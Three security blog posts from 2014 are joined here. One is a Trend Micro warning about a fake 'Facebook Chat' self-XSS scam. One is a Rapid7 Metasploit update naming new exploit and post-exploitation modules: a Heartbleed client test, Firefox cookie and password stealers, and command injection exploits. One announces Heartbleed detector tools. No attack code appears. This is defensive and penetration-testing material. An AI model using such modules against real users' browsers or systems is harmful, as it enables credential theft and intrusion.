Facebook users are once again the target of a malicious scheme—this time in the form of a notification about “Facebook Chat”.
The spammed notification pretends to come from the “official Facebook Chat Team.” A notification shows users of a tagged comment to a Facebook Note containing a fake announcement about a Facebook Chat verification requirement.
Figure 1. Facebook Chat verification notification
The spam tries to sound urgent to convince users to verify their accounts. To do so, they are first asked to to go to a Pastebin URL and are instructed to copy a specific code. The set of instructions differ depending on what browser is being used (Google Chrome, Mozilla Firefox, or Internet Explorer).
From the get-go, users should know that there is no product called “Facebook Chat,” let alone a team that sends out a supposed “advisory” to its users. The social media site’s official instant messaging feature is called Facebook Messenger, which also the name of its stand-alone app. Earlier this month, Facebook announced that Android and iOS users will be required use this stand-alone app by eliminating the chat features of the traditional app versions of the site.
Facebook has taken action against threats like this by releasing an official announcement. The official Facebook warning notes, “This is a variant on the self-XSS attack. By pasting the code in the browser console, the user gives the code access to their account. The code usually posts the same scam on other people’s walls, and subscribes the user to pages controlled by the attacker – but it could do much worse things.”
In 2013, a mobile phishing page disguised as a legitimate Facebook mobile page has been used to victimize users by stealing their credit card details. In the same year, the Facebook Security Check page has been spoofed by phishers leading to a number of stolen account credentials.
Protecting your online accounts from different threats requires constant vigilance. Always check and verify links that are sent your way, even if they come from a friend or contact. In the same light, sift through the number of contacts you add to your network and only add those you know personally to minimize risks of compromising your accounts and harming your computer.Since April 2012, Trend Micro has worked hand in hand with Facebook to secure and shield users from attacks such as this. We already block all threats associated with this attack.
So, full disclosure: I haven't written an update blog post in almost a month. I'm a terrible person, I know. The reasons are many, of course -- we had a Metasploit 4.9 release at the tail end of March, and then we had this Heartbleed thing happen in early April which still continues to dominate the thoughts and action of everyone I know. Yeah, I don't know many people outside of security. I'm kind of a loser like that.
That said, the Metasploit juggernaught stops for no single bug. The exploit elves have been hard at work bringing in new non-Heartbleed exploits, so let's take a look at what's actually new this week. But first...
I promise I won't say Heartbleed again
But give me one or two more paragraphs just to get it out of my system. Today's release has both an updated Heartbleed server-side module as well as the new Heartbleed client-side module. Since it's client-side, you can't just "scan" your infrastructure for this vulnerability; you need to get your network users to at least click a link. Lucky for you, though, you don't need to direct them to some site out on the Internet (and give away your security intelligence in the process).
Using the Metasploit module, it's pretty trivial to fire it up and test out your existing client software that you use and trust for SSL communications. Does your phone's browser link against a vulnerable version of OpenSSL? Are you sure? How about that curl-based cron job you've been running for the last six months to snag the latest Dogecoin prices and triggers your buy and sell orders? Software like that is notoriously difficult to identify, let alone test, but hopefully with this module you can at least solve that testing part.
I promise, I'll shut my yap about Heartbleed now, and just be thankful for the continued job security that it's providing for me and all my friends.
More Firefox skulduggery
People download crap from the Internet all the time. This is a demonstrable fact which causes no end of frustration to IT administrators and security-minded family members alike. "But I'm no dummy," your users (or mother) might say, "I don't use MSIE on Windows -- I use Firefox on a Mac! Totally safe and virus free!"
Well, Rapid7's own Joe Vennix has been on a tear with Firefox lately. He's got three more post modules for unlucky Firefox users -- a cookie stealer (actually, released with 4.9.2), a browser history revealer, and, best of all, a saved password dumper. These all get really useful if you happen to have a browser exploit that can take advantage of the Firefox privileged payloads. Oh, and by "exploit," you can take that to also mean, "a malicious add-on that the user opted into."
What this all boils down to is, the crafty penetration tester can use these Metasploit post-exploit modules to help illustrate the true risk to an organization from a Firefox-based compromise. That's a nice win.New Modules
We have eight new modules this week for you, including the ones mentioned above. You know what to do.
- eScan Web Management Console Command Injection by juan vazquez and Joxean Koret
- Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution by Brandon Perry exploits ZDI-14-069
- Vtiger Install Unauthenticated Remote Command Execution by Jonathan Borgeaud exploits CVE-2014-2268
- MS14-017 Microsoft Word RTF Object Confusion by Haifei Li, Spencer McIntyre, and unknown exploits CVE-2014-1761
Auxiliary and post modules
- OpenSSL Heartbeat (Heartbleed) Client Memory Exposure by hdm, Antti, Matti, Neel Mehta, and Riku exploits CVE-2014-0160
- Windows Gather Enumerate Active Domain Users by Ben Campbell and Etienne Stalmans
If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.
In previous blog entries, we’ve discussed various aspects of the Heartbleed vulnerability in OpenSSL. Last Tuesday, our first blog post covered an analysis of the vulnerability itself, as well as some steps that IT administrators of affected systems could do in order to protect themselves. Later entries looked at how popular websites and mobile apps were, in their own ways, vulnerable to the threat.
To help deal with the Heartbleed vulnerability, we’ve released several tools that can be used to detect possible exposure to the risks:
We have released into the Google Play app store the Trend Micro Heartbleed Detector. This tool is designed to help users tell if they are vulnerable to any aspect of this threat. In particular, it checks for three things:
- It checks whether the version of OpenSSL used in the device’s version of Android may be vulnerable.
- It checks whether any OpenSSL libraries embedded in the user’s installed apps may be vulnerable.
- It checks whether the user’s installed apps communicate to any unpatched (and therefore, vulnerable) servers.
Figure 1. Detector application
If any vulnerable apps are detected, the detector offers to uninstall the app for the user:
Figure 2. Vulnerable app detected
We don’t recommend for users to immediately uninstall all vulnerable apps, but this is something everyone should consider for applications that handle critical information, such as mobile banking applications. In addition, it’s a good idea for users to contact the companies that maintain these vulnerable apps to update their apps or websites as soon as possible.
For Chrome users, we’ve also released the Trend Micro OpenSSL Heartbleed Scanner app. The scanner allows for users to check if specific sites are vulnerable to Heartbleed. The tool can be downloaded from the Chrome Web Store.
For other users who want to check if a site is vulnerable or not, you may also do so through our Trend Micro Heartbleed Detector website.
We will continue to monitor this issue and release more information as needed. For other posts discussing the Heartbleed bug, check our entries from the past week:
- Bundled OpenSSL Library Also Makes Apps and Android 4.1.1 Vulnerable to Heartbleed
- Heartbleed Bug—Mobile Apps are Affected Too
- Heartbleed Vulnerability Affects 5% of Select Top Level Domains from Top 1M
- Skipping a Heartbeat: The Analysis of the Heartbleed OpenSSL Vulnerability